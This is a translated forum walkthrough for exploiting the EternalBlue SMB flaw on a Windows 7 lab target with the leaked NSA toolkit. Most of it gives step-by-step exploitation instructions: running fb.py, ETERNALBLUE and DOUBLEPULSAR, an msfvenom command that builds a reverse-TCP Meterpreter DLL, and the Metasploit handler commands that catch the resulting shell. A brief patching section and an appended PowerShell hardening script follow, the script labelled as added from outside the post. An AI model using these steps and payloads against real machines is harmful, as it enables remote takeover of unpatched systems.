EternalBlue

1. Download location for the leaked NSA tools:

https://github.com/x0rz/EQGRP_Lost_in_Translation

2. Installation

Environment setup

Note: you must install Python 2.6; other versions do not work.

Download and install Python 2.6

Download and install pywin32

Add C:\Python26 to the PATH environment variable.

Environment configuration: extract the downloaded EQGRP_Lost_in_Translation archive, locate \windows\fb.py, and comment out the two sections shown in the screenshots below.

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_39b56a01170cc8b.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_23291fd01ed3127.png

3. Lab environment

Attacker 1: 192.168.71.133, Windows Server 2008, 32-bit

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_613ec3ea50c5fcf.png

Attacker 2: 192.168.71.130, Kali 2

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_14a8883aa2ff7b6.png

Target: 192.168.199.107, Windows 7 64-bit

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_a9a2e1d2a07d991.png

4. Exploitation steps:

On attacker 1 (192.168.71.133), with Python, pywin32 and the NSA tools installed, run fb.py from C:\shadowbroker-master\windows:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_eaf55e7bc91690b.png

Set the target IP address 192.168.199.107 and the callback address 192.168.71.133 (attacker 1), disable redirection, set the log path, and create or select a project.

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_5c6436fb04f496a.png

Next, enter the command:

use ETERNALBLUE

Fill in the parameters one by one; defaults such as the timeout can be accepted by pressing Enter:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_8e331786f0fe51e.png

Since the target runs Windows 7, choose 1: win72k8r2 at the target OS prompt.

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_aa4e1361fc748e9.png

For the mode, choose 1: FB

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_b67806a2bd26198.png

Confirm the settings and execute.

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_5480346077ceb7c.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_754ebf06d730318.png

After it succeeds, run use Doublepulsar:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_d6566e3f2d00c1d.png

Fill in the parameters in order; at the function prompt, choose 2, rundll.

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_68890ccf3467c9e.png

Meanwhile, on attacker 2 (Kali), generate the payload DLL with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130 LPORT=5555 -f dll > go.dll

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_11c4c9d54b08f3e.png

Then run:

$ msfconsole

msf > use exploit/multi/handler

msf > set LHOST 192.168.71.130

msf > set LPORT 5555

msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf > exploit

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_1858c1a169a7a78.png

Upload the generated go.dll to attacker 1 (192.168.71.133), return to attacker 1, and enter the path to the DLL:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_4f4b4bace573f10.png

Press Enter through the remaining prompts to launch the attack.

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_4f4cc38cd916d4a.png

Back on Kali, a shell is received; the attack succeeded:

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_2a88f3f87676d29.png

5. Mitigations

Microsoft states that it has already patched the Windows vulnerabilities released by the Shadow Brokers group. After the hacking tools, which may originate from the NSA, were published online yesterday, Microsoft was able to test and confirm that patches are available for all currently supported Windows versions. This means older Windows XP or Windows Vista systems may still be vulnerable to the three released exploits, but since Microsoft no longer supports them, it is unlikely to provide patches for these older versions of Windows.

Please apply the patches promptly and close ports 139, 445 and 3389 wherever they are not needed.

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_ea76272c56eb5b0.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_2fc005f70a45ab8.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_a9cfa59653135d7.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_4d48478f39aabd5.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_d59a1ca4d84e33e.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_7f0f5ad57130265.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_125889a29c3fde6.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_0ca1160f82b1fad.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_5e218da5acf8bc8.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_58703b683acb866.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_a834f3ab00c63fb.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_326f2c8c307aa38.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_4738d245f8dac6b.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_a3dcdb2cd9b2fb8.png

https://xianzhi.aliyun.com/forum/attachment/Mon_1704/4_1712380166889088_dc93f1e167a1eb3.png
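The mitigation section above recommends patching and closing ports 139, 445 and 3389. The following PowerShell script is an added example, not part of the original post, that audits a Windows 7 / Server 2008 R2 host for exactly those points (missing update, SMBv1 server still enabled, the three ports listening) and optionally applies the hardening; it assumes an elevated session, and the KB identifier is a placeholder to be filled from Microsoft's advisory for the host's OS.

```powershell
# Added example (not from the original post): audit and harden a Windows 7 /
# Server 2008 R2 host against the SMB attack path described above.
# Assumptions: elevated PowerShell 2.0+ session; $RequiredKBs is a placeholder
# list to be filled from Microsoft's advisory for this OS build.
param(
    [string[]]$RequiredKBs = @('KB<PLACEHOLDER>'),   # placeholder, see above
    [switch]$Harden                                   # omit for audit only
)

$findings = @()

# 1. Is the SMB security update installed?
$installed = Get-HotFix | ForEach-Object { $_.HotFixID }
foreach ($kb in $RequiredKBs) {
    if ($installed -notcontains $kb) { $findings += "Missing update $kb" }
}

# 2. Is the SMBv1 server still enabled? (Microsoft's documented registry switch;
#    absence of the value means SMBv1 is on by default.)
$srvKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$smb1 = (Get-ItemProperty -Path $srvKey -ErrorAction SilentlyContinue).SMB1
if ($smb1 -ne 0) { $findings += 'SMBv1 server enabled' }

# 3. Are the ports named in the post listening? Pattern anchors on the colon so
#    :445 does not match :1445 or :4450.
$netstat = netstat -an
foreach ($p in 139, 445, 3389) {
    if ($netstat | Select-String -Pattern ":$p\s+\S+\s+LISTENING" -Quiet) {
        $findings += "TCP port $p is listening"
    }
}

if ($findings.Count -eq 0) { Write-Output 'No findings.' }
else { $findings | ForEach-Object { Write-Output "FINDING: $_" } }

if ($Harden) {
    # Disable the SMBv1 server; takes effect after a reboot.
    Set-ItemProperty -Path $srvKey -Name SMB1 -Type DWord -Value 0 -Force
    # Block inbound NetBIOS, SMB and RDP at the host firewall for all profiles.
    # Drop 3389 from localport if the host must stay reachable over RDP.
    netsh advfirewall firewall add rule name="Block NetBIOS/SMB/RDP inbound" `
        dir=in action=block protocol=TCP localport=139,445,3389
}
```

Run without -Harden first to see what the host reports; the update check stays red until the placeholder is replaced with the real KB number for that OS.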